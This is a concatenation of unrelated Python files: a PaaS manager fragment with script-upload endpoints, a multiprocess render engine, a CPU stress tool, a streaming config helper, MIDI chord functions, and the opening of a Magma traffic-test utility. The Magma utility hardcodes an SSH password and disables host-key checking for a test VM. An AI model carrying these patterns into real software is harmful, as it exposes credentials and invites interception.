return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='key should be a file').message)
key_lines = key.file.readlines()
num_added = git.add_authorized_keys(key_lines)
return HttpJsonResponse({'outcome': "%s keys added to authorized_keys" % num_added })
@expose('GET')
def get_service_performance(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({
'request_rate': 0,
'error_rate': 0,
'throughput': 0,
'response_time': 0,
})
@expose('POST')
def git_push_hook(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
repo = git.DEFAULT_CODE_REPO
codeVersionId = git.git_code_version(repo)
config.codeVersions[codeVersionId] = CodeVersion(id=codeVersionId,
filename=codeVersionId,
atype="git",
description=git.git_last_description(repo))
self._configuration_set(config)
return HttpJsonResponse({ 'codeVersionId': codeVersionId })
@expose('GET')
def get_service_history(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({'state_log': self.state_log})
@expose('GET')
def getSummerSchool(self, kwargs):
pac = self.memcache.get_multi([self.DEPLOYMENT_STATE, self.CONFIG, 'adapting_count', 'nodes_additional'])
ret = [pac[self.DEPLOYMENT_STATE], len(pac[self.CONFIG].serviceNodes)]
if 'adapting_count' in pac: ret += [pac['adapting_count']]
else: ret += [0]
nodes = [ i.id for i in pac[self.CONFIG].serviceNodes.values() ]
if 'nodes_additional' in pac: nodes += pac['nodes_additional']
ret += [str(nodes)]
return ret
def upload_script(self, kwargs, filename):
"""Write the file uploaded in kwargs['script'] to filesystem.
Return the script absolute path on success, HttpErrorResponse on
failure.
"""
self.logger.debug("upload_script: called with filename=%s" % filename)
# Check if the required argument 'script' is present
if 'script' not in kwargs:
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_MISSING, 'script').message)
script = kwargs.pop('script')
# Check if any trailing parameter has been submitted
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
# Script has to be a FileUploadField
if not isinstance(script, FileUploadField):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID, detail='script should be a file').message)
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, filename)
# Write the uploaded script to filesystem
with open(fullpath, 'w') as script_file:
    script_file.write(script.file.read())
self.logger.debug("upload_script: script uploaded successfully to '%s'"
% fullpath)
# Return the script absolute path
return fullpath
@expose('UPLOAD')
def upload_startup_script(self, kwargs):
ret = self.upload_script(kwargs, 'startup.sh')
if type(ret) is HttpErrorResponse:
# Something went wrong. Return the error
return ret
# Rebuild context script
self.controller.generate_context("web")
# All is good. Return the filename of the uploaded script
return HttpJsonResponse({ 'filename': ret })
@expose('GET')
def get_startup_script(self, kwargs):
"""Return contents of the currently defined startup script, if any"""
basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
fullpath = os.path.join(basedir, 'startup.sh')
try:
return HttpJsonResponse(open(fullpath).read())
except IOError:
return HttpErrorResponse('No startup script')
@expose('UPLOAD')
def upload_adhoc_script(self, kwargs):
# TODO
# pop all the arguments besides 'script' from kwargs.
ret = self.upload_script(kwargs, 'adhoc.sh')
if type(ret) is HttpErrorResponse:
# Something went wrong. Return the error
return ret
# TODO
# All is good. Run the script on the specified subset of machines
|
workflow.py
|
# Copyright (c) 2014-2021, Dr Alex Meakins, Raysect Project
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Raysect Project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from multiprocessing import get_context, cpu_count
from raysect.core.math import random
import time
class RenderEngine:
"""
Provides a common rendering workflow interface.
This is a base class; its functionality must be implemented fully by the derived class.
This class provides a rendering workflow that abstracts away the underlying
system performing the work. It is intended that render engines may be built
that provide rendering on single cores, multi-cores (SMP) and clusters.
The basic workflow is as follows. The render task is split into small,
self-contained chunks of work - 'tasks'. These tasks are passed to the
render engine which distributes the work to the available computing
resources. These discrete computing resources are known as "workers".
Workers process one task at a time and return their result to the render
engine. When results are received the render engine assembles them into
the final result.
This workflow is implemented by supplying a set of tasks and two methods to
the render engine's run() method, which processes those tasks. The functions
supplied to the run() method may be given additional args and kwargs.
A worker calls render for each task object received. render has the following signature: ::
def render(task, *render_args, **render_kwargs)
where args and kwargs are additional arguments supplied by the user.
Similarly, the worker calls update() for the results generated by a call to
render(). Update() has the following signature: ::
def update(results, *update_args, **update_kwargs)
where args and kwargs are additional arguments supplied by the user.
The render() function must return an object representing the results;
this must be a picklable Python object.
Tasks are not guaranteed to execute in order. If the order
is critical, an identifier should be passed as part of the task definition
and returned in the result. This will permit the order to be reconstructed.
"""
def run(self, tasks, render, update, render_args=(), render_kwargs={}, update_args=(), update_kwargs={}):
"""
Starts the render engine executing the requested tasks.
:param list tasks: List of user defined tuples that describe the task to execute.
:param object render: Callable python object that executes the tasks.
:param object update: Callable python object that is called following a render task and must be
used to update the internal state of the object requesting work.
:param tuple render_args: Additional arguments to pass to user defined render function.
:param tuple render_kwargs: Additional keyword arguments to pass to user defined render function.
:param tuple update_args: Additional arguments to pass to user defined update function.
:param tuple update_kwargs: Additional keyword arguments to pass to user defined update function.
"""
raise NotImplementedError("Virtual method must be implemented in sub-class.")
def worker_count(self):
"""
Returns the number of workers in use by this engine.
"""
raise NotImplementedError("Virtual method must be implemented in sub-class.")
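# A minimal sketch of the render/update pair described in the RenderEngine
# docstring above. The names _example_render and _example_update are purely
# illustrative and not part of this module; each task is assumed to be an
# (identifier, value) tuple so that results can be reassembled in order.
def _example_render(task, scale=1.0):
    task_id, value = task
    # return a small, picklable result object
    return task_id, value * scale
def _example_update(result, results_store):
    task_id, value = result
    # reassemble results by task identifier, independent of completion order
    results_store[task_id] = value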
class SerialEngine(RenderEngine):
"""
Render engine for running on a single CPU processor.
This engine is useful for debugging.
>>> from raysect.core import SerialEngine
>>> from raysect.optical.observer import PinholeCamera
>>>
>>> camera = PinholeCamera((512, 512))
>>> camera.render_engine = SerialEngine()
"""
def run(self, tasks, render, update, render_args=(), render_kwargs={}, update_args=(), update_kwargs={}):
for task in tasks:
result = render(task, *render_args, **render_kwargs)
update(result, *update_args, **update_kwargs)
def worker_count(self):
return 1
class MulticoreEngine(RenderEngine):
"""
A render engine for distributing work across multiple CPU cores.
The number of processes spawned by this render engine is controlled via
the processes attribute. This can also be set at object initialisation.
If the processes attribute is set to None (the default), the render engine
will automatically set the number of processes to be equal to the number
of CPU cores detected on the machine.
If a render is being performed where the time to compute an individual task
is comparable to the latency of the inter process communication (IPC), the
render may run significantly slower than expected due to waiting for the
IPC to complete. To reduce the impact of the IPC overhead, multiple tasks
are grouped together into jobs, requiring only one IPC wait for multiple
tasks.
By default the number of tasks per job is adjusted automatically. The
tasks_per_job attribute can be used to override this automatic adjustment.
To reenable the automated adjustment, set the tasks_per_job attribute to
None.
:param processes: The number of worker processes, or None to use all available cores (default).
:param tasks_per_job: The number of tasks to group into a single job, or None if this should be determined automatically (default).
:param start_method: The method used to start child processes: 'fork' (default), 'spawn' or 'forkserver'.
.. code-block:: pycon
>>> from raysect.core import MulticoreEngine
>>> from raysect.optical.observer import PinholeCamera
>>>
>>> camera = PinholeCamera((512, 512))
>>>
>>> # allowing the camera to use all available CPU cores.
>>> camera.render_engine = MulticoreEngine()
>>>
>>> # or forcing the render engine to use a specific number of CPU processes
>>> camera.render_engine = MulticoreEngine(processes=8)
"""
def __init__(self, processes=None, tasks_per_job=None, start_method='fork'):
super().__init__()
self.processes = processes
self.tasks_per_job = tasks_per_job
self._context = get_context(start_method)
@property
def processes(self):
return self._processes
@processes.setter
def processes(self, value):
if value is None:
self._processes = cpu_count()
else:
value = int(value)
if value <= 0:
raise ValueError('Number of concurrent worker processes must be greater than zero.')
self._processes = value
@property
def tasks_per_job(self):
return self._tasks_per_job
@tasks_per_job.setter
def tasks_per_job(self, value):
if value is None:
self._tasks_per_job = 1
self._auto_tasks_per_job = True
else:
if value < 1:
raise ValueError("The number of tasks per job must be greater than zero or None.")
self._tasks_per_job = value
self._auto_tasks_per_job = False
def run(self, tasks, render, update, render_args=(), render_kwargs={}, update_args=(), update_kwargs={}):
# establish ipc queues
job_queue = self._context.SimpleQueue()
result_queue = self._context.SimpleQueue()
tasks_per_job = self._context.Value('i')
# start process to generate jobs
tasks_per_job.value = self._tasks_per_job
producer = self._context.Process(target=self._producer, args=(tasks, job_queue, tasks_per_job))
producer.start()
# start worker processes
workers = []
for pid in range(self._processes):
p = self._context.Process(target=self._worker, args=(render, render_args, render_kwargs, job_queue, result_queue))
p.start()
workers.append(p)
# consume results
remaining = len(tasks)
while remaining:
results = result_queue.get()
# has a worker failed?
if isinstance(results, Exception):
# clean up
for worker in workers:
if worker.is_alive():
worker.terminate()
producer.terminate()
# wait for processes to terminate
for worker in workers:
worker.join()
producer.join()
# raise the exception to inform the user
raise results
# update state with new results
for result in results:
update(result, *update_args, **update_kwargs)
remaining -= 1
# shutdown workers
for _ in workers:
job_queue.put(None)
# store tasks per job value for next run
self._tasks_per_job = tasks_per_job.value
def worker_count(self):
return self._processes
def _producer(self, tasks, job_queue, stored_tasks_per_job):
# initialise request rate controller constants
target_rate = 50 # requests per second
min_time = 1 # seconds
min_requests = min(2 * target_rate, 5 * self._processes)
tasks_per_job = stored_tasks_per_job.value
# split tasks into jobs and dispatch to workers
requests = -self.processes # ignore the initial jobs, the requests are instantaneous
start_time = time.time()
while tasks:
# assemble job
job = []
for _ in range(tasks_per_job):
if tasks:
job.append(tasks.pop())
continue
break
# add job to queue
job_queue.put(job)
requests += 1
# if enabled, auto adjust tasks per job to keep target requests per second
if self._auto_tasks_per_job:
elapsed_time = (time.time() - start_time)
if elapsed_time > min_time and requests > min_requests:
# re-normalise the tasks per job based on previous work to propose a new value
requests_rate = requests / elapsed_time
proposed = tasks_per_job * requests_rate / target_rate
# gradually adjust tasks per job to reduce risk of oscillation
tasks_per_job = 0.1 * proposed + 0.9 * tasks_per_job
tasks_per_job = max(1, round(tasks_per_job))
# reset counters
requests = 0
start_time = time.time()
# pass back new value
stored_tasks_per_job.value = tasks_per_job
def _worker(self, render, args, kwargs, job_queue, result_queue):
# re-seed the random number generator to prevent all workers inheriting the same sequence
random.seed()
# process jobs
while True:
job = job_queue.get()
# have we been commanded to shutdown?
if job is None:
break
results = []
for task in job:
try:
results.append(render(task, *args, **kwargs))
except Exception as e:
# pass the exception back to the main process and quit
result_queue.put(e)
break
# hand back results
result_queue.put(results)
if __name__ == '__main__':
class Job:
def __init__(self, engine=None):
self.total = 0
self.engine = engine if engine else MulticoreEngine()
def run(self, v):
self.total = 0
self.engine.run(list(range(v)), self.render, self.update, render_args=(10000,))
return self.total
def render(self, task, count):
sum = 0
for i in range(count):
sum += 1 / count
return sum
def update(self, result):
self.total += result
n = 20000
t = time.time()
j = Job(SerialEngine())
print(j.run(n), time.time() - t)
t = time.time()
j = Job(MulticoreEngine())
print(j.run(n), time.time() - t)
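# A hedged variation of the demo above showing the tuning knobs described in
# the MulticoreEngine docstring; the processes and tasks_per_job values here
# are illustrative only, not recommendations.
t = time.time()
j = Job(MulticoreEngine(processes=2, tasks_per_job=50))
print(j.run(n), time.time() - t)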
|
pystress.py
|
__version__ = '0.2.1'
from multiprocessing import Process, active_children, cpu_count, Pipe
import os
import signal
import sys
import time
FIB_N = 100
DEFAULT_TIME = 60
try:
DEFAULT_CPU = cpu_count()
except NotImplementedError:
DEFAULT_CPU = 1
def loop(conn):
proc_info = os.getpid()
conn.send(proc_info)
conn.close()
while True:
fib(FIB_N)
def fib(n):
if n < 2:
return 1
else:
return fib(n - 1) + fib(n - 2)
def sigint_handler(signum, frame):
procs = active_children()
for p in procs:
p.terminate()
os._exit(1)
signal.signal(signal.SIGINT, sigint_handler)
def get_args():
exec_time = DEFAULT_TIME
proc_num = DEFAULT_CPU
if len(sys.argv) > 3:
raise ValueError("too many arguments")
if len(sys.argv) == 2:
exec_time = int(sys.argv[1])
if len(sys.argv) == 3:
exec_time = int(sys.argv[1])
proc_num = int(sys.argv[2])
return exec_time, proc_num
def _main():
try:
exec_time, proc_num = get_args()
except Exception:
msg = "Usage: pystress [exec_time] [proc_num]\n"
sys.stderr.write(msg)
sys.exit(1)
pystress(exec_time, proc_num)
def pystress(exec_time, proc_num):
procs = []
conns = []
for _ in range(proc_num):
parent_conn, child_conn = Pipe()
p = Process(target=loop, args=(child_conn,))
p.start()
procs.append(p)
conns.append(parent_conn)
for conn in conns:
try:
print(conn.recv())
except EOFError:
continue
time.sleep(exec_time)
for p in procs:
p.terminate()
if __name__ == "__main__":
_main()
|
utitls.py
|
import hmac
import hashlib
import secrets
import json
import datetime
import traceback
import re
import signal, psutil
import threading
K_MANUAL_JSON_PATH = 'manualRestream.json'
K_CONFIG_JSON_PATH = 'config.json'
k_LOG_PATH = 'mainLog.log'
def myLogger(logStr):
resStr = str(datetime.datetime.now()) + " [MyLOGGER] " + str(logStr)
try:
print(resStr)
except Exception as e:
print(e)
with open(k_LOG_PATH, 'a+', encoding='utf-8') as tmpFile:
tmpFile.write(resStr + '\n')
def verifySecert(verifyMsg, i_msg):
i_msg = str.encode(i_msg) if isinstance(i_msg, str) else i_msg
key = configJson().get('subSecert', '')
key = str.encode(key)
hexdig = hmac.new(key, msg=i_msg, digestmod=hashlib.sha1).hexdigest()
print(verifyMsg, hexdig)
return verifyMsg == hexdig
def remove_emoji(text):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002700-\U000027BF" # Dingbats
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', text)
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
process.send_signal(sig)
def checkIsSupportForwardLink(forwardLink):
check_list = [
'.m3u8',
'twitcasting.tv/',
'youtube.com/', 'youtu.be/',
'twitch.tv/',
'showroom-live.com/',
'openrec.tv/'
]
for word in check_list:
if word in forwardLink:
return True
return False
def configJson():
with open(K_CONFIG_JSON_PATH, 'r', encoding='utf-8') as f:
configDict = json.loads(f.read())
# generate the secret key
if configDict.get('subSecert') == "":
configDict['subSecert'] = secrets.token_hex(16)
saveConfigJson(configDict)
return configDict
def getSubInfosWithSubChannelId(channelId):
ret_list = []
confDict = configJson()
for subscribe in confDict.get('subscribeList', []):
if channelId in subscribe.get('youtubeChannelId', "").split(','):
if channelId != "":
ret_list.append(subscribe)
return ret_list
def getSubInfosWithSubTwitterId(twitterId):
ret_list = []
confDict = configJson()
for subscribe in confDict.get('subscribeList', []):
if twitterId in subscribe.get('twitterId', "").split(','):
if twitterId != "":
ret_list.append(subscribe)
return ret_list
def getSubWithKey(key, val):
ret = None
for subscribe in configJson().get('subscribeList', []):
if subscribe.get(key) == val:
ret = subscribe
break
return ret
def setSubInfoWithKey(key, val, subDict):
confDict = configJson()
for subscribe in confDict.get('subscribeList', []):
if subscribe.get(key) == val:
subscribe.update(subDict)
saveConfigJson(confDict)
return
def saveConfigJson(config_dict):
with open(K_CONFIG_JSON_PATH, 'w', encoding='utf-8') as wf:
json.dump(config_dict, wf, indent=4, sort_keys=True)
def addManualSrc(srcNote, srcLink):
tmp_dict = manualJson()
src_dict = tmp_dict.get('src_dict', {})
src_dict[srcNote] = srcLink
tmp_dict['src_dict'] = src_dict
saveManualJson(tmp_dict)
def addManualDes(desNote, desLink):
tmp_dict = manualJson()
des_dict = tmp_dict.get('des_dict', {})
des_dict[desNote] = desLink
tmp_dict['des_dict'] = des_dict
saveManualJson(tmp_dict)
def manualJson():
manualDict = {"src_dict":{}, "des_dict":{}}
try:
with open(K_MANUAL_JSON_PATH, 'r', encoding='utf-8') as f:
manualDict = json.loads(f.read())
except FileNotFoundError:
saveManualJson(manualDict)
return manualDict
def saveManualJson(manualDict):
with open(K_MANUAL_JSON_PATH, 'w', encoding='utf-8') as wf:
json.dump(manualDict, wf, indent=4, sort_keys=True)
def runFuncAsyncThread(target_func, args):
try:
t = threading.Thread(target=target_func, args=args)
t.start()
except Exception as e:
myLogger(traceback.format_exc())
myLogger(str(e))
|
midi.py
|
import mido
from time import sleep
from scipy.signal import medfilt
import random
import threading
C = 60
G = 55
A = 57
F = 53
NOTES = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
def midi_number_to_note(number):
octave = number // len(NOTES) - 1
note = NOTES[number % len(NOTES)]
return note + str(octave)
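# e.g. midi_number_to_note(60) -> 'C4', midi_number_to_note(69) -> 'A4'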
# some example using mido from
# https://natespilman.com/blog/playing-chords-with-mido-and-python/
def note(note, velocity=64, time=2):
"""
note: midi note
velocity: "how fast the note was struck or released" - dynamic
channel: 0..15
time: "not included in the encoded message"
"""
message = mido.Message("note_on", note=note, velocity=velocity, time=time)
return message
def note_off(note, velocity=64, time=2):
return mido.Message("note_off", note=note, velocity=velocity, time=time)
def major_chord(root, outport, velocity=64, duration=0.2):
"""Major chord from the root note"""
if root + 7 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 7, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 7, velocity))
def minor_chord(root, outport, velocity=64, duration=0.2):
"""Minor chord based on the root node"""
if root + 7 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 7, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 7, velocity))
def major_seventh(root, outport, velocity=64, duration=0.2):
"""Major seventh chord based on root node"""
if root + 11 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 7, velocity))
outport.send(note(root + 11, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 7, velocity))
outport.send(note_off(root + 11, velocity))
def minor_seventh(root, outport, velocity=64, duration=0.2):
"""Minor seventh chord based on root node"""
if root + 10 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 7, velocity))
outport.send(note(root + 10, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 7, velocity))
outport.send(note_off(root + 10, velocity))
def dom_seventh(root, outport, velocity=64, duration=0.2):
"""Dominate seventh chord based on root node"""
if root + 10 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 7, velocity))
outport.send(note(root + 10, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 7, velocity))
outport.send(note_off(root + 10, velocity))
def dim_seventh(root, outport, velocity=64, duration=0.2):
"""diminished seventh chord based on root node"""
if root + 9 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 6, velocity))
outport.send(note(root + 9, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 6, velocity))
outport.send(note_off(root + 9, velocity))
def half_dim_seventh(root, outport, velocity=64, duration=0.2):
"""half diminished seventh chord based on root node"""
if root + 10 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 3, velocity))
outport.send(note(root + 6, velocity))
outport.send(note(root + 10, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 3, velocity))
outport.send(note_off(root + 6, velocity))
outport.send(note_off(root + 10, velocity))
def aug_seventh(root, outport, velocity=64, duration=0.2):
"""augmented seventh chord based on root node"""
if root + 11 > 127:
return
outport.send(note(root, velocity))
outport.send(note(root + 4, velocity))
outport.send(note(root + 8, velocity))
outport.send(note(root + 11, velocity))
sleep(duration)
outport.send(note_off(root, velocity))
outport.send(note_off(root + 4, velocity))
outport.send(note_off(root + 8, velocity))
outport.send(note_off(root + 11, velocity))
def fifths(root, outport, velocity=64, duration=0.2):
"""Stacking fifths harmony that are aboved the root note"""
for i in range(25):
if root + i * 7 > 127:
break
outport.send(note(root + i * 7, velocity))
sleep(duration)
for i in range(25):
if root + i * 7 > 127:
break
outport.send(note_off(root + i * 7, velocity))
def fifth_scale(root, outport, velocity=64, duration=0.1):
"""Stacking fifths scale that are aboved the root note"""
for i in range(25):
if root + i * 7 > 127:
break
outport.send(note(root + i * 7, velocity))
sleep(0.1)
outport.send(note_off(root + i * 7, velocity))
def fourths(root, outport, velocity=64, duration=0.2):
"""Stacking fourths harmony that are aboved the root note"""
for i in range(25):
if root + i * 5 > 127:
break
outport.send(note(root + i * 5, velocity))
sleep(duration)
for i in range(25):
if root + i * 5 > 127:
break
outport.send(note_off(root + i * 5, velocity))
def fourth_scale(root, outport, velocity=64, duration=0.1):
"""Stacking fourths scale that are aboved the root note"""
for i in range(25):
if root + i * 5 > 127:
break
outport.send(note(root + i * 5, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note_off(root + i * 5, velocity))
def fourth_scale_down(root, outport, velocity=64, duration=0.1):
"""Downward fourths scale that are aboved the root note"""
for i in range(25):
if root - i * 5 < 0:
break
outport.send(note(root - i * 5, velocity))
sleep(random.randint(1, 10)/100)
# outport.send(note_off(root - i * 5, velocity))
sleep(random.randint(1, 30)/100)
def fifth_scale_down(root, outport, velocity=64, duration=0.1):
"""Stacking fifths scale that are aboved the root note"""
for i in range(25):
if root - i * 7 < 0:
break
outport.send(note(root - i * 7, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note_off(root - i * 7, velocity))
sleep(random.randint(1, 20)/100)
def transpose(root, outport, velocity=64, duration=0.1, transpose_range=9, delay_time=2):
"""play and transpose"""
create_thread(root, outport, velocity, duration)
sleep(delay_time)
root = int(root + transpose_range)
create_thread(root, outport, velocity, duration)
def inverse(root, outport, velocity=64, duration=0.1, octave=1, delay_time=2):
"""play and transpose"""
inverted = (root // len(NOTES) - 1) * 12 + 11 - root % len(NOTES)
create_thread(root, outport, velocity, duration)
sleep(delay_time)
root = int(inverted - octave * 12)
create_thread(root, outport, velocity, duration)
def flip(root, outport, velocity=64, duration=0.1, axis=60, delay_time=2):
"""play and flip"""
create_thread(root, outport, velocity, duration)
sleep(delay_time)
root = int(2 * axis - root)
create_thread(root, outport, velocity, duration)
def triad_octave(root, outport, velocity=64, duration=0.1):
for i in range(10):
if root - i * 7 - 5 < 0:
break
# dom_seventh(root + i * 12, velocity)
outport.send(note(root - i * 7, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note(root - i * 7, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note(root - i * 7 - 5, velocity))
sleep(random.randint(1, 10)/100)
outport.send(note(root - i * 7 - 5, velocity))
sleep(0.2)
sleep(random.randint(1, 10)/100)
outport.send(note_off(root + i * 7, velocity))
def create_thread(midinote, outport, velocity, elapsed):
thread = threading.Thread(
target=play, args=(midinote, outport, velocity, elapsed)
)
thread.start()
def play(root, outport, velocity=64, duration=3):
print(f"Pitch: {midi_number_to_note(root)} {velocity})")
if root >= 0 & root <= 127:
outport.send(note(root, velocity))
if duration < 2:
duration = 2
sleep(duration)
outport.send(note_off(root, velocity))
# midi to note example from https://github.com/justinsalamon/
# audio_to_midi_melodia/blob/master/audio_to_midi_melodia.py
def midi_to_notes(midi, fs, hop, smooth, minduration):
# smooth midi pitch sequence first
if smooth > 0:
filter_duration = smooth # in seconds
filter_size = int(filter_duration * fs / float(hop))
if filter_size % 2 == 0:
filter_size += 1
midi_filt = medfilt(midi, filter_size)
else:
midi_filt = midi
# print(len(midi),len(midi_filt))
notes = []
p_prev = None
duration = 0
onset = 0
for n, p in enumerate(midi_filt):
if p == p_prev:
duration += 1
else:
# treat 0 as silence
if p_prev > 0:
# add note
duration_sec = duration * hop / float(fs)
# only add notes that are long enough
if duration_sec >= minduration:
onset_sec = onset * hop / float(fs)
notes.append((onset_sec, duration_sec, p_prev))
# start new note
onset = n
duration = 1
p_prev = p
|
traffic_util.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import copy
import ctypes
import ipaddress
import os
import shlex
import socket
import subprocess
import threading
import iperf3
import pyroute2
import s1ap_types
from util.traffic_messages import (
TrafficMessage,
TrafficRequest,
TrafficRequestType,
TrafficResponseType,
TrafficTestInstance,
)
# Tests shouldn't take longer than a few minutes
TRAFFIC_TEST_TIMEOUT_SEC = 180
# To let the verify function run properly, set the iperf data timeout 5 seconds lower
IPERF_DATA_TIMEOUT_SEC = TRAFFIC_TEST_TIMEOUT_SEC - 5
"""
Using TrafficUtil
=================
TrafficUtil is designed to have one main entry point: generate_traffic_test.
This function sets up the necessary legwork to configuring the trfgen framework
in the S1AP tester and generating a TrafficTest object that represents the
configurations and constraints of the traffic that is to be generated.
Once generated, the TrafficTest object can be run -- either directly with the
start() function or as a context, using the `with' keyword. The wait() function
gives the tester the option to wait on the test completing before continuing.
Essentially, TrafficUtil is just a bridge for packaging together the parameters
of a given test. Once packaged, the actual testing is done via the TrafficTest
API.
"""
class TrafficUtil(object):
"""Utility wrapper for tests requiring traffic generation"""
# Trfgen library setup
_trfgen_lib_name = "libtrfgen.so"
_trfgen_tests = ()
# This is set to True if the data traffic fails with some error
# and leaving behind running iperf3 server(s) in TRF server VM
need_to_close_iperf3_server = False
# Traffic setup
_remote_ip = ipaddress.IPv4Address("192.168.129.42")
def __init__(self):
"""Initialize the trfgen library and its callbacks"""
# _test_lib is the private variable containing the ctypes reference to
# the trfgen library.
self._test_lib = None
self._init_lib()
# _config_test is the private variable containing the ctypes reference
# to the trfgen_configure_test() function in trfgen. This function is
# called to inform the S1AP tester of the parameters of a test suite,
# and is used to pass along configuration options to the tester.
self._config_test = None
self._setup_configure_test()
# _start_test is the private variable containing the ctypes reference
# to the trfgen_start_test() function in trfgen. This function is
# called to begin a single trfgen instance on a given address, using
# the predefined configuration options set with configure_test().
self._start_test = None
self._setup_start_test()
# We collect references to the data we pass into ctypes to prevent
# Python's garbage collection system from coming in and cleaning up the
# memory used, which can result in unspecified behavior.
self._data = ()
# Configuration for triggering shell commands in TRF server VM
self._cmd_data = {
"user": "vagrant",
"host": "192.168.60.144",
"password": "vagrant",
"command": "test",
}
self._command = (
"sshpass -p {password} ssh "
"-o UserKnownHostsFile=/dev/null "
"-o StrictHostKeyChecking=no "
"{user}@{host} {command}"
)
def exec_command(self, command):
"""
Run a command remotely on magma_trfserver VM.
Args:
command: command (str) to be executed on remote host
e.g. 'sed -i \'s/str1/str2/g\' /usr/local/bin/traffic_server.py'
Returns:
Shell command execution output
"""
data = self._cmd_data
data["command"] = '"' + command + '"'
param_list = shlex.split(self._command.format(**data))
return subprocess.call(
param_list,
shell=False,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
def update_dl_route(self, ue_ip_block):
"""Update downlink route in TRF server"""
ret_code = self.exec_command(
"sudo ip route flush via 192.168.129.1 && sudo ip route "
"replace " + ue_ip_block + " via 192.168.129.1 dev eth2",
)
return ret_code == 0
def close_running_iperf_servers(self):
"""Close running Iperf3 servers in TRF server VM"""
ret_code = self.exec_command(
"pidof iperf3 && pidof iperf3 | xargs sudo kill -9",
)
return ret_code == 0
def _init_lib(self):
"""Initialize the trfgen library by loading in binary compiled from C
"""
lib_path = os.environ["S1AP_TESTER_ROOT"]
lib = os.path.join(lib_path, "bin", TrafficUtil._trfgen_lib_name)
os.chdir(lib_path)
self._test_lib = ctypes.cdll.LoadLibrary(lib)
self._test_lib.trfgen_init()
def _setup_configure_test(self):
"""Set up the call to trfgen_configure_test
The function prototype is:
void trfgen_configure_test(int test_id, struct_test test_parms)
This function call caches the test configurations specified in the
